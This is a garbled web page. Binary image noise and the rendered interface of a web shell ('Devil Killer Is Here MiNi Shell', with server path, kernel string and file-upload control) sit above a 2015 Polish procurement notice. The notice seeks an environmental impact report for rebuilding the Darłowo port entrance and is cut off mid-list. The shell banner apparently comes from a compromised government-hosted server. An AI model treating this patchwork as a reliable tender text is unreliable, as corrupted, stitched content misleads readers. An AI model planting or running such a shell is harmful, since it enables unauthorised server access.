JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150831/128531-N-2015.html

<p class="kh_header"><b>Słupsk: Wykonanie raportu o oddziaływaniu przedsięwzięcia na środowisko dla zadania pn.: Przebudowa wejścia do Portu Darłowo</b><br>
<b>Numer ogłoszenia: 128531 - 2015; data zamieszczenia: 31.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Słupsku , Al. Sienkiewicza 18, 76-200 Słupsk, woj. pomorskie, tel. 059 8428406, faks 059 8428406, 8412443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umsl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie raportu o oddziaływaniu przedsięwzięcia na środowisko dla zadania pn.: Przebudowa wejścia do Portu Darłowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie raportu o oddziaływaniu na środowisko jako załącznika do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach dla przedsięwzięcia pn.: Przebudowa wejścia do Portu Darłowo, projektowanego na terenie działek nr 1/22, 1/25, 1/64, 1/8, 1/50, 1/56, 1/57, 1/58, 1/66, 1/92, 1/93, 1/94 obr. 2 m. Darłowo.
2.Dokumentacja powinna być wykonana zgodnie z obowiązującymi przepisami prawnymi a przede wszystkim zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r., Nr 199, poz. 1227 z późn.zm.).
2.Zlecane opracowanie w postaci raportu oddziaływania przedsięwzięcia na środowisko powinno spełniać wymogi określone w:
a)Art. 66 i 67 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko 
(Dz.U. z 2008 r., Nr 199, poz. 1227 z późn.zm.),
b)postanowieniu Regionalnego Dyrektora Ochrony Środowiska w Szczecinie z dnia 9 stycznia 2015 r. o sygn. WST-K-4211.8.2013.BM.11.
2.4. Zakres raportu winien zawierać informacje, o których mowa w art. 66 ustawy, tj.:
1) opis planowanego przedsięwzięcia, a w szczególności:
-charakterystykę całego przedsięwzięcia i warunki użytkowania terenu w fazie budowy i eksploatacji lub użytkowania,
-główne cechy charakterystyczne procesów produkcyjnych,
-przewidywane rodzaje i ilości zanieczyszczeń, wynikające z funkcjonowania planowanego przedsięwzięcia;
2)opis elementów przyrodniczych środowiska objętych zakresem przewidywanego oddziaływania na środowisko, w tym elementów środowiska objętych ochroną na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody, przy czym w przypadku, gdy planowane przedsięwzięcie związane jest z działalnością polegającą na poszukiwaniu i rozpoznawaniu złoża węglowodorów metodą otworów wiertniczych lub wydobywaniu węglowodorów ze złoża tą metodą, opis tych elementów powinien zawierać się w obszarze określonym promieniem 500 m od zewnętrznej granicy przedsięwzięcia;
3)	opis istniejących w sąsiedztwie lub w bezpośrednim zasięgu oddziaływania planowanego przedsięwzięcia zabytków chronionych na podstawie przepisów o ochronie zabytków i opiece nad zabytkami;
4)opis przewidywanych skutków dla środowiska w przypadku niepodejmowania przedsięwzięcia;
5)opis analizowanych wariantów, w tym:
-wariantu proponowanego przez wnioskodawcę oraz racjonalnego wariantu alternatywnego,
-wariantu najkorzystniejszego dla środowiska wraz z uzasadnieniem ich wyboru;
6)określenie przewidywanego oddziaływania na środowisko analizowanych wariantów, w tym również w przypadku wystąpienia poważnej awarii przemysłowej, a także możliwego transgranicznego oddziaływania na środowisko, a w przypadku drogi w transeuropejskiej sieci drogowej określenie także wpływu planowanej drogi na bezpieczeństwo ruchu drogowego;
7)uzasadnienie proponowanego przez wnioskodawcę wariantu, ze wskazaniem jego oddziaływania na środowisko, w szczególności na:
a)ludzi, rośliny, zwierzęta, grzyby i siedliska przyrodnicze, wodę i powietrze,
b)powierzchnię ziemi, z uwzględnieniem ruchów masowych ziemi, klimat i krajobraz,
c)dobra materialne,
d)zabytki i krajobraz kulturowy, objęte istniejącą dokumentacją, w szczególności rejestrem lub ewidencją zabytków,
e)wzajemne oddziaływania między elementami, o których mowa w lit. a-d,
f)bezpieczeństwo ruchu drogowego w przypadku drogi w transeuropejskiej sieci drogowej;
8) opis metod prognozowania zastosowanych przez wnioskodawcę oraz opis przewidywanych znaczących oddziaływań planowanego przedsięwzięcia na środowisko, obejmujący bezpośrednie, pośrednie, wtórne, skumulowane, krótko, średnio i długoterminowe, stałe i chwilowe oddziaływania na środowisko, wynikające z:
-istnienia przedsięwzięcia,
-wykorzystywania zasobów środowiska,
-emisji,
9)opis przewidywanych działań mających na celu zapobieganie, ograniczanie lub kompensację przyrodniczą negatywnych oddziaływań na środowisko, w szczególności na cele i przedmiot ochrony obszaru Natura 2000 oraz na integralność tego obszaru,
10) jeżeli planowane przedsięwzięcie jest związane z użyciem instalacji, porównanie proponowanej technologii z technologią spełniającą wymagania, o których mowa w art. 143 ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska;
11) wskazanie czy dla planowanego przedsięwzięcia jest konieczne ustanowienie obszaru ograniczonego użytkowania w rozumieniu przepisów ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska, oraz określenie granic takiego obszaru, ograniczeń w zakresie przeznaczenia terenu, wymagań technicznych dotyczących obiektów budowlanych i sposobów korzystania z nich (nie dotyczy to przedsięwzięć polegających na budowie drogi krajowej),
12) przedstawienie zagadnień w formie graficznej;
13) przedstawienie zagadnień w formie kartograficznej w skali odpowiadającej przedmiotowi i szczegółowości analizowanych w raporcie zagadnień oraz umożliwiającej kompleksowe przedstawienie przeprowadzonych analiz oddziaływania przedsięwzięcia na środowisko;
14) analizę możliwych konfliktów społecznych związanych z planowanym przedsięwzięciem;
15) przedstawienie propozycji monitoringu oddziaływania planowanego przedsięwzięcia na etapie jego budowy i eksploracji lub użytkowania, w szczególności na cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru,
16) wskazanie trudności wynikających z niedostatków techniki lub luk we współczesnej wiedzy, jakie napotkano, opracowując raport,
17)streszczenie w języku niespecjalistycznym informacji zawartych w raporcie, w odniesieniu do każdego elementu raportu,
18) nazwisko osoby lub osób sporządzających raport,
19) źródła informacji stanowiące podstawę do sporządzenia raportu.
5. W raporcie musi znaleźć się odniesienie do wszystkich punktów zawartych w postanowieniu Regionalnej Dyrekcji Ochrony Środowiska w Szczecinie o sygn. WST-K-4211.8.2013.BM.11 z dnia 09.01.2015r.:
1)	Przedstawienia szczegółowego opisu prac przygotowawczych do realizacji inwestycji (w tym opisu zagadnień związanych z transportem materiałów budowlanych) oraz prac przewidzianych do wykonania na etapie realizacji przedmiotowej inwestycji (sposobu i terminu ich wykonania, miejsca lokalizacji zaplecza budowy) i ich oddziaływania na poszczególne komponenty środowiska.
2)Opisu warunków środowiskowych w miejscu lokalizacji przedsięwzięcia i w jego strefie oddziaływania.
3)Określenia granic obszaru objętego potencjalnym oddziaływaniem przedsięwzięcia.
4)Przedstawienia wyników inwentaryzacji siedliskowej, która powinna zawierać:
-informacje o zastosowanej metodyce badań,
-informacje o wszystkich siedliskach przyrodniczych oraz gatunkach roślin objętych ochroną oraz wymienionych w rozporządzeniu Ministra Środowiska z dnia 13 kwietnia 2010 r. w sprawie siedlisk przyrodniczych oraz gatunków będących przedmiotem zainteresowania Wspólnoty, a także kryteriów wyboru obszarów kwalifikujących się do uznania lub wyznaczenia jako obszary Natura 2000 (Dz.U. z 2014 r., poz. 1713), występujących na terenie planowanej inwestycji oraz w strefie jej oddziaływania, - mapę z rozmieszczeniem ww. siedlisk i gatunków roślin chronionych.
5)Przedstawienia listy wszystkich gatunków zwierząt podlegających ochronie oraz wymienionych w załącznikach do rozporządzenia Ministra Środowiska z dnia 13 kwietnia 2010 r. w sprawie siedlisk przyrodniczych oraz gatunków będących przedmiotem zainteresowania Wspólnoty, a także kryteriów wyboru obszarów kwalifikujących się do uznania lub wyznaczenia jako obszary Natura 2000 (Dz.U. z 2014 r., poz. 1713) zlokalizowanych w zasięgu oddziaływania oraz w miejscu realizacji planowanej inwestycji, sporządzonej w oparciu o wyniki inwentaryzacji przyrodniczej terenu przeznaczonego pod inwestycję oraz w jej strefie oddziaływania.
6)Wskazania na załączniku graficznym rozmieszczenia zinwentaryzowanych siedlisk przyrodniczych, siedlisk gatunków roślin i zwierząt, ze szczególnym uwzględnieniem tych siedlisk przyrodniczych, siedlisk gatunków roślin i zwierząt, dla ochrony, których wyznaczono obszary Natura 2000, w odniesieniu do istniejącego i planowanego zagospodarowania terenu.
7)Przeprowadzenia analizy dotyczącej środowiska życia Morza Bałtyckiego w miejscu realizacji planowanej inwestycji, z uwzględnieniem poszczególnych grup organizmów występujących na tym obszarze (w szczególności organizmów bentosowych, ichtiofauny, awifauny i ssaków morskich).
8)Oceny zagrożenia negatywnymi oddziaływaniami podczas realizacji i eksploatacji przedmiotowej inwestycji na podlegające prawnej ochronie siedliska przyrodnicze i gatunki roślin i zwierząt, w tym te, dla których ochrony zostały wyznaczone obszary Natura 2000, w szczególności dla:
-grupy bezkręgowców i ryb będących pożywieniem dla ptaków,
-ikry ryb składanej na dnie lub larw ryb bytujących na dnie lub w strefie przydennej, mogącej stanowić lokalną bazę żerowiskową,
-migracji i tarlisk ryb,
-awifauny,
-ssaków morskich,
-obszarów w sąsiedztwie, w tym dla lęgowisk ptaków.
9)Przedstawienia propozycji działań minimalizujących lub kompensujących negatywne oddziaływanie przedmiotowej inwestycji na zinwentaryzowane siedliska przyrodnicze oraz siedliska roślin i zwierząt podlegających ochronie gatunkowej.
10)Przedstawienia w sposób graficzny lokalizacji przedsięwzięcia w odniesieniu do obszarów Natura 2000 i innych obszarów cennych pod względem przyrodniczym.
11)Oceny wpływu przedmiotowej inwestycji na cel i przedmiot ochrony położonych w zasięgu oddziaływania inwestycji powierzchniowych form ochrony przyrody, w tym przedstawienia wpływu inwestycji na poszczególne przedmioty i cele ochrony, jak również na spójność i integralność obszarów Natura 2000 pozostających w zasięgu oddziaływania inwestycji.
12)Oceny przyjętych do realizacji w ramach przedmiotowego zamierzenia inwestycyjnego rozwiązań technicznych i technologicznych w kontekście prawnych uwarunkowań realizacji inwestycji wprowadzonych zarządzeniem Regionalnego Dyrektora Ochrony Środowiska w Szczecinie oraz Regionalnego Dyrektora Ochrony Środowiska w Gdańsku z dnia 6 maja 2014 r. w sprawie ustanowienia planu zadań ochronnych dla obszaru Natura 2000 Dolina Wieprzy i Studnicy PLH 220038 (Dz. U. Woj. Zach. z 2014 r., poz. 2098)
13)Przedstawienia analizy skumulowanych oddziaływań na środowisko przedmiotowej inwestycji z innymi istniejącymi i planowanymi przedsięwzięciami, w szczególności tych, które mogą mieć znaczenie dla celu ochrony obszarów Natura 2000.
14)Analizy wariantowania przedmiotowej inwestycji, w szczególności oceny wpływu realizacji alternatywnych wariantów na poszczególne elementy środowiska, w tym gatunki roślin i zwierząt podlegające prawnej ochronie oraz siedliska przyrodnicze zinwentaryzowane na terenie przedmiotowych nieruchomości gruntowych oraz mieszczące się w zasięgu oddziaływania analizowanego przedsięwzięcia.
15)Przedstawienia rozpoznania warunków środowiska gruntowo-wodnego w miejscu lokalizacji inwestycji.
16)Przeanalizowania wpływu na środowisko gruntowo-wodne planowanego przedsięwzięcia oraz wskazania zagrożeń oraz sposobów zabezpieczenia przed zanieczyszczeniem środowiska gruntowo-wodnego.
17)Oceny realizacji inwestycji w odniesieniu do celów środowiskowych dla jednolitych części wód powierzchniowych (oceny wpływu inwestycji na jakość wód powierzchniowych, z uwzględnieniem wskaźników jakości ekologicznej, w tym biologicznej, fizykochemicznej, substancji szkodliwych dla środowiska wodnego oraz chemicznej, w tym substancji priorytetowych).
18)Oceny realizacji inwestycji w odniesieniu do celów środowiskowych dla jednolitych części wód podziemnych (oceny wpływu inwestycji na jakość wód podziemnych, z uwzględnieniem wskaźników jakości fizykochemicznej wód oraz parametrów ilościowych).
19)Przedstawienia metod ewentualnego ograniczenia wpływu planowanego przedsięwzięcia na środowisko wodne w odniesieniu do zapisów wynikających z dyrektywy 2000/60/WE Parlamentu Europejskiego i Rady z dnia 23 października 2000 r. ustanawiającej ramy wspólnotowego działania w dziedzinie polityki wodnej tzw. ramowej dyrektywy Wodnej (Dz.Urz. UE L327 z dnia 22 grudnia 2000 r.) i zapisów ustawy z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2012 r., poz.145 ze zm.).
20)Bilansu ilościowo - jakościowego odpadów wytwarzanych w fazie realizacji i eksploatacji inwestycji w oparciu o rozporządzenie Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. Nr 112, poz. 1206) z uwzględnieniem miejsc i sposobów magazynowania wytworzonych odpadów oraz sposobów ich późniejszego zagospodarowania.
21)Określenia sposobu postępowania w przypadku rozlewów substancji ropopochodnych oraz zapobiegania ich rozprzestrzenianiu.
22)Oceny wpływu przedmiotowej inwestycji na środowisko w związku z ewentualnym wystąpieniem sytuacji awarii polegającej na rozlewie substancji ropopochodnych.
23)Określenia wpływu potencjalnych sytuacji awaryjnych na gatunki oraz siedliska podlegające ochronie w ramach europejskiej sieci ekologicznej Natura 2000 wraz z odniesieniem się do przedmiotów ochrony poszczególnych obszarów morskich pozostających w zasięgu oddziaływania.
24) Określenia potencjalnych sposobów przeciwdziałania i usuwania skutków zaistniałej sytuacji awaryjnej.
25)Przedstawienia informacji dotyczących zanieczyszczenia powietrza zarówno w fazie realizacji, jak i eksploatacji inwestycji uwzględniając emisję niezorganizowaną (transport materiałów koniecznych do wykorzystania w fazie realizacji, ruch pojazdów transportowych w obrębie miejsca lokalizacji inwestycji, itp.).
26)Zidentyfikowania źródeł emisji hałasu do środowiska zarówno w fazie budowy, jak i eksploatacji inwestycji, zidentyfikowania terenów chronionych akustycznie z uwzględnieniem zapisów miejscowego planu zagospodarowania przestrzennego, jeżeli obowiązuje oraz istniejącego i planowanego zagospodarowania, określenia działań mających na celu zminimalizowanie tej emisji.
27)Oceny wpływu inwestycji na krajobraz kulturowy, w szczególności objęty rejestrem lub ewidencją zabytków.
28)Uzasadnienia braku transgranicznego oddziaływania   planowanej   inwestycji   na poszczególne komponenty środowiska.
29)Przedstawienia rozwiązań chroniących środowisko z podziałem na działania planowane w fazie realizacji i w fazie eksploatacji planowanego przedsięwzięcia.
30)Wskazania ewentualnych ograniczeń, jakim będzie podlegać rybołówstwo prowadzone w sąsiedztwie lokalizowanego przedsięwzięcia.
2.6.	Szata graficzna
1)Wykonawca wykona Raport o oddziaływaniu na środowisko w szacie graficznej, która spełnia następujące wymagania:
-zapewnia czytelność, przejrzystość i jednoznaczność treści,
- część opisowa zostanie sporządzona na komputerze, w formacie A4,
-rysunki i mapy będą zaopatrzone w stosowne legendy i opisy umożliwiające odczytanie informacji w nich zawartych,
-załączniki graficzne winny być wykonane w skali odpowiadającej przedmiotowi i szczegółowości analizowanych w raporcie zagadnień.
2)Przed przekazaniem raportu do odbioru końcowego Wykonawca przedstawi Zamawiającemu do akceptacji proponowaną szatę graficzną opracowania.
7.Dokumenty będące przedmiotem niniejszej umowy wykonać należy w ilości 5 egzemplarzy w formie pisemnej oraz w 2 egzemplarzach w formie elektronicznej.
8.Jeżeli wykonany dokument będący przedmiotem umowy będzie wymagał uzupełnienia lub poprawek, Wykonawca wykona je w terminie wyznaczonym przez Zamawiającego, bez dodatkowego wynagrodzenia.
9.Wykonawca zobowiązany jest do bieżącego udzielania wyjaśnień oraz wykonania uzupełnień w procesie uzyskiwania decyzji o środowiskowych uwarunkowaniach, uzyskiwanej przez Zamawiającego oraz ewentualnym procesie odwoławczym, bez dodatkowego wynagrodzenia.
10.W ramach I etapu zostaną wykonane:
1.Analiza materiałów wyjściowych, danych literaturowych materiałów archiwalnych oraz otrzymanych 
od Zamawiającego opracowań projektowych;
2.Dokonanie oceny istniejących danych obserwacyjnych i pomiarowych oraz innych informacji dotyczących stanu środowiska i dóbr kultury, występujących uciążliwości, a także danych zawartych w istniejących opracowaniach dotyczących stanu środowiska; 
3.Wykonanie obserwacji weryfikacyjnych w terenie, pomiarów, badań, obliczeń, ekspertyz oraz analiz potrzebnych do wykonania przedmiotu zamówienia a możliwych do wykonania m.in. ze względu na czas trwania okresu wegetacyjnego i lęgowego ( zgodnie z pkt. 2 ust. 2.3 SIWZ). 
4.Przedstawienie Zamawiającemu wstępnego projektu raportu, opracowanego na podstawie dotychczas przeprowadzonych obserwacji bądź pomiarów oraz informacji dot. inwestycji, przekazanych przez Zamawiającego.
11.W ramach II etapu zostaną wykonane:
1.Kontynuacja wykonanych w etapie I oraz wykonanie dalszych pomiarów, badań, obliczeń, ekspertyz oraz analiz niezbędnych do wykonania przedmiotu zamówienia,
2.Opracowanie wyników wykonanych dotychczas obserwacji w terenie, pomiarów, badań, obliczeń, ekspertyz i analiz wraz z uzyskaniem opinii i akceptacji Zamawiającego, w miarę konieczności dokonanie stosownych zmian i uzupełnień w treści opracowania, zgodnie z pkt. 2 ust. 2.3 SIWZ;
3.Przekazanie kompletnego raportu o oddziaływaniu przedsięwzięcia na środowisko do Zamawiającego, wykonanego zgodnie z pkt. 2 ust. 2.3; 2,6; 2,7 SIWZ oraz zgodnie umową.
12.Opis przedmiotu zamówienia za pomocą kodów CPV Wspólnego Słownika Zamówień:
71313440-1: Usługi oceny wpływu na środowisko naturalne (EIA) dla projektu budowlanego. 
71313400-9  Ocena wpływu projektu budowlanego na środowisko naturalne.
2.13.	Zamawiający nie dopuszcza składania ofert częściowych.
2.14.	Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.34.40-1, 71.31.34.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 1 500,00 zł. (słownie: jeden tysiąc pięćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
- co najmniej jedną dokumentację projektową na zadanie związane z wykonaniem morskiej budowli hydrotechnicznej w rozumieniu zapisu rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 1 czerwca 1998 r. w sprawie warunków technicznych jakim powinny odpowiadać morskie budowle hydrotechniczne i ich usytuowanie (Dz. U. 1998 nr 101 poz. 645), o wartości co najmniej 80.000,00 zł brutto; 
oraz
- co najmniej jedną usługę, której przedmiotem było wykonanie opracowania w zakresie badania dna morskiego (np. inwentaryzacja przyrodnicza pod wykonanie raportu OOŚ lub rozpoznanie złóż)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca zapewni przy realizacji zamówienia udział jednej osoby, pełniącej funkcję kierownika zespołu, posiadającą wyższe wykształcenie, która była autorem raportu o oddziaływaniu przedsięwzięcia na środowisko, o których mowa w ustawie z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2013 poz. 1235 z późn. zm) o zakresie obejmującym wykonanie morskiej budowli hydrotechnicznymi w rozumieniu przepisów rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 1 czerwca 1998r. w sprawie warunków technicznych jakim powinny odpowiadać morskie budowle hydrotechniczne i ich usytuowanie (Dz. U. z 1998 nr 101 poz. 645);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
